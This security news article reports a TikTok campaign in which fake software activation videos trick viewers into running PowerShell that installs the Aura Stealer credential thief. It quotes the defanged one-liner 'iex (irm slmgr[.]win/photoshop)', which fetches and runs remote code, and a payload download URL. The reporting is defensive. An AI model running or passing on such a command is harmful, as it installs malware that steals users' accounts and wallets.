Cybercriminals are using TikTok to distribute information-stealing malware through a campaign that tricks users into infecting their computers with malicious software by disguising it as free activation guides for popular software.
ISC Handler Xavier Mertens identified the ongoing operation on October 19, 2025, which uses social engineering tactics to deceive users. The campaign bears similarities to an operation observed by Trend Micro in May, where TikTok videos falsely claimed to offer instructions for activating legitimate software such as Windows, Microsoft 365, Adobe Premiere, Photoshop, CapCut Pro, and Discord Nitro, as well as fabricated services like “Netflix Premium” and “Spotify Premium.”
The attack technique employed is known as a ClickFix attack, which involves providing seemingly helpful instructions that deceive users into running malicious commands. The videos display a short, one-line PowerShell command and instruct viewers to execute it with administrator privileges. An example command shown is iex (irm slmgr[.]win/photoshop). The specific program name within the URL is altered to match the software being impersonated in the video.
When a user executes this command, PowerShell connects to the remote site slmgr[.]win, retrieving and running a second PowerShell script. This script then downloads two executable files from Cloudflare pages. The first file, downloaded from https://file-epq[.]pages[.]dev/updater.exe, is a variant of the Aura Stealer malware designed to harvest saved credentials from web browsers, authentication cookies, cryptocurrency wallets, and login data from other applications. The stolen information is then uploaded to the attackers, granting them access to the victim’s accounts.
A second payload, named source.exe, is also downloaded and used to self-compile code using the .NET framework’s built-in Visual C# Compiler (csc.exe). The compiled code is subsequently injected and launched directly in memory. However, the specific purpose of this second payload has not yet been determined.
Users who have followed the instructions in these videos are advised to consider all of their credentials compromised and immediately reset passwords for all websites and online services they use. ClickFix attacks have become significantly more common over the past year, used to distribute various malware strains in campaigns related to ransomware and cryptocurrency theft.
As a general security practice, users should never copy text from a website and execute it in an operating system dialog box, including the File Explorer address bar, command prompt, PowerShell, macOS terminal, or Linux shells.
